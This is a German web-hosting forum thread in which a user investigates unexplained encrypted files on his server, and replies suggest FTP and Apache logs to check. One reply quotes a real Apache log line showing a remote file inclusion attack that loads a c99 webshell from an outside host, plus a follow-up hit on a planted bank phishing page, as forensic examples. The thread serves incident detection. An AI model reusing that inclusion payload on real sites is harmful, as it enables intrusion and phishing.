Anscheinend Account gehackt.

Lord_Icon

Lord_Icon

Member
Hi,

ich habe heute durch zufall gesehen, das ich diverse Datein auf mein Webspace habe, die ich unmöglich angelegt haben kann.

Es handelt sich hier um verschlüsselte Daten (mit ionCube) die ein ein ISP Programm (ähnlich Confixx) darstellt. Das diese Datei ein Programm vom Server angelegt hat, ist somit unmöglich. Ausserdem leigt es in /srv/www/htdocs/kundenverzeichniss
Also im FTP Bereich, wo normalerweise kein Server Programm reinschreibt.

Da es im Kundenverzeichniss (bzw. in MEIN Privaten Verzeichniss) liegt, ist es auch für die "aussenwelt" erreichbar. Denke als, das verwendet bzw. irgendwie benutzt / getestet wird.

Laut /var/log/messages hat sich heute noch keiner eingeloogt. Über den SSH Port kann diese Datei alsi nicht angelegt worden sein (Timestamp vom Ordner ist heute gegen 9 (wo ich noch gepennt habe) )

Ergo: Datei MUß per FTP hochgeladen worden sein. Und das heißt, das jemand mein Username + passwort irgendwie gehackt hat.
Ja = ftp Passwort wurde beriets geändert.

Um das zukünftig aber zu unterbinden bzw. eher zu bemerken, hier meine Frage:

Frage 1:
Ist es möglich, das das System mir eine Mail schickt, wenn sich jemand per SSH einloggt. ?
Müßte dann ein minütliches Cron Job Script sein, der die messages Datei auswertet. Nur wie müßte dieses heißen ?

Frage 2:
Wo wird denn ein FTP Zugriff geloggt ? Ich habe hier keine Datei im /var/log gefunden. Denn da sollte ja wie bei SSH eine IP geloggt sein (i hope so)
So würde ich ja den "hacker" ausfindig machen könnne ( wenn er kein Proxy / anonymisier verwendet)

DAAAAKEeee..
 
Lord_Icon said:
Frage 2:
Wo wird denn ein FTP Zugriff geloggt ? Ich habe hier keine Datei im /var/log gefunden. Denn da sollte ja wie bei SSH eine IP geloggt sein (i hope so)
So würde ich ja den "hacker" ausfindig machen könnne ( wenn er kein Proxy / anonymisier verwendet)
Click to expand...


Bei mir wird das auch in /var/log geloggt.
ftp_auth.log heißt die Datei bei mir und ich hab noch eine Logdatei namens ftp_access.log wo genau Dokumentiert wird was gelöscht und was hochgeladen wurde.
 
DAS dachte ich mir schon.

Denn solche Datein fehlen mir. Ich habe keine einzigste Datei namens ftp in /var/log.

Verwenden tu ich vsftpd.
Du auch ?

Wie bekomme ich denn eine Log datei hin ?
Bzw. das das System die Datein loggt ?
Sollte das System das nicht bereits automatisch machen ?
 
/var/log/xferlog
Verwendest du Plesk oder so? Dann findest du die Datei evtl. auch bei den Kunden. Wenn du die Datei nicht findest, dann schau in deiner Conf nach ;)

Es ist sehr unwahrscheinlich, dass dein vermeintlicher Einbrecher über FTP gekommen ist, außer du verwendest ein extrem unsicheres Passwort. Hast du vielleicht PHP Seiten laufen? Ich würde eher darauf tippen, dass jemand über PHP reingekommen ist.
 
AHHH....

Da iss es ja
var/log/xferlog


Aber leider ohne Erfolg. Es gibt kein Log Eintrag, der diesen upload anzeigt.

Dann bleibt wohl doch nur der PHP Upload.

Aber wie geht das denn ?
Kann ich soetwas unterbinden ?
Wird ein php upload geloggt ?
 
Die Datei wurde vom User ID: 1003 mit der Gruppe: 8 hochgeladen.

Lade ich eine Datei über FTP hoch, so lautet die User_ID auch: 1003 aber die Gruppe: 1000

Ergo: Es kann nicht über FTP hochgeladen sein, da sonst die Gruppe+User gleich ist.

Zwischenfrage: wie bekomme ich denn den namen der Gruppe (ID_8) raus ?

Wenn PHP Upload dann SOLLTE die Grupper bestimmt wwwrun lauten. (?)
 
Darkdream hat mit beidem recht, hier trotzdem nochmal ein paar Tipps.

Die Gruppe siehst du durch öffnen der Datei /etc/group oder so:

Code: 
root@srv:#>  grep :8: /etc/group

Sie v.a. mal das accesslog deines Apache (z.B. /var/log/apache2/access.log) rund um die fragliche Zeit gründlich durch. Darin findest du mit großer Warscheinlichkeit einen Hinweis auf den Angriff.

Ein Servereinbruch in den Logs lässt sich relativ einfach sehen, wenn man weiss, welche Dienste man laufen hat und wie das Log üblicherweise aussieht. Hier ist mal eine Beispielzeile von einem erfolgreichen Angriff auf ein in das CMS Mambo integrierte Modul com_forum (PHPBB, was sonst). Man beachte das Überschreiben der Variable phpbb_root_bpath in der URL:

Code: 
41.204.224.10 - - [18/Apr/2007:21:44:56 +0200] "GET
/components/com_forum/download.php?phpbb_root_path=http://crashz.by.ru/shell/c99.txt?
HTTP/1.1" 200 70032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)" "www.<somedaomain>.com"

Hier hat also jemand von der IP 41.204.224.10 einen Fehler in download.php ausgenutzt und die c99 webshell von einem Remoterechner geladen. In diesem Fall wurde dann eine Phishing-Webseite in einem Unterverzeichnis des Forums installiert. Es hilft oft auch, in den Logs nach Zugriffen auf die verdächtigen neuen Dateien zu suchen, da die meisten Angreifer/Angriffsskripte danach den Erfolg ihrer Methode testen.

Hier sieht man den Testzugriff auf die Phishingseite in den Apachelogs:

Code: 
41.204.224.10 - - [23/Apr/2007:17:18:40 +0200] "GET
/components/com_forum/files/bankofamerica/bankofamerica/onlineid.signin/bankofamerica/online_bofa_banking/e-online-banking/index.htm
HTTP/1.1" 200 38315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)" "www.<somedomain>.com"

Nach sowas solltest du Ausschau halten. Viel Erfolg.
 
Last edited by a moderator:
You must log in or register to reply here.
Back
Top